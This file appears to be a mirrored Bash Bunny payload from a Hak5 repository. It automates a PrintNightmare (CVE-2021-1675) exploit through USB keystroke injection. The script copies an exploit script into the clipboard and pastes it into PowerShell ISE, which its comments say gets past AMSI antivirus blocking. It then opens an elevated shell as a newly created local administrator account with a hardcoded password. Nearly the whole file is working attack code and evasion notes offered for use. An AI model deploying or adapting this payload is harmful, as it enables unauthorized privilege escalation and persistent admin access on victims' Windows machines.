mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
babdc72743
* Housekeeping Moved some of the QUACK Powershell commands into the juicybit.txt file for speed and ease of use. * Update README.md * More improvement Added exit to the juicybits rather than using alt and /noprofile to the run as * Update README.md Co-authored-by: Marc <foxtrot@realloc.me>
79 lines
2.4 KiB
Plaintext
79 lines
2.4 KiB
Plaintext
#Title: PrintNightmare
|
|
#Author: PanicAcid
|
|
#Version: 1.2
|
|
#
|
|
#Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator account
|
|
#without bypassing defender or exectuon policy. It aint prudy but it works.
|
|
#
|
|
#Powershell AMSI or whatever it's called kept picking it up and blocking it every time I tried to call the script externally,
|
|
#even bypassing execution policy seemed to work but the output would always contain
|
|
#"This script contains malicious content and has been blocked by your antivirus software."
|
|
#
|
|
#However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! (Well copy and paste it!)
|
|
#
|
|
#Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER.
|
|
#Additionally thanks to Korben and Foxtrot for putting up with my nonsense.
|
|
#
|
|
# NOTE - you may need to tweak the delays a bit, with version 1.0 I took for granted that it ran really fast on my machine which caused
|
|
# some issues for other folks whereby it'd close the ise window before finishing execution etc. so test and tweak the dealys to your hearts
|
|
# content.
|
|
#
|
|
# Purple.............Loading
|
|
# Green .............Execute
|
|
# Off................Finished
|
|
#
|
|
#!/bin/bash
|
|
|
|
# OPTIONS - More options available in the Powershell payload
|
|
OBFUSCATECMD="N" # Y=yes or N=no
|
|
|
|
#-----------------------------------
|
|
# Purple LED - initializing
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
DUCKY_LANG gb
|
|
|
|
# Attackmode HID
|
|
ATTACKMODE HID STORAGE
|
|
|
|
#-----------------------------------
|
|
# Green LED - executing credential_powershell
|
|
LED STAGE1
|
|
QUACK GUI r
|
|
QUACK DELAY 300
|
|
QUACK STRING powershell.exe
|
|
QUACK ENTER
|
|
QUACK DELAY 100
|
|
QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
QUACK STRING exit
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK GUI r
|
|
QUACK DELAY 500
|
|
QUACK STRING powershell_ise.exe
|
|
QUACK ENTER
|
|
QUACK DELAY 4000
|
|
QUACK CONTROL d
|
|
QUACK CONTROL v
|
|
QUACK CONTROL d
|
|
QUACK ENTER
|
|
QUACK DELAY 3000
|
|
QUACK GUI r
|
|
QUACK DELAY 500
|
|
QUACK STRING cmd
|
|
QUACK DELAY 150
|
|
QUACK ENTER
|
|
QUACK DELAY 150
|
|
QUACK STRING "runas /noprofile /user:Hak5Rules cmd.exe && exit"
|
|
QUACK ENTER
|
|
QUACK DELAY 150
|
|
QUACK STRING Hak5Rules
|
|
QUACK DELAY 150
|
|
QUACK ENTER
|
|
|
|
#-----------------------------------
|
|
# Kill the lights - finished
|
|
LED FINISH |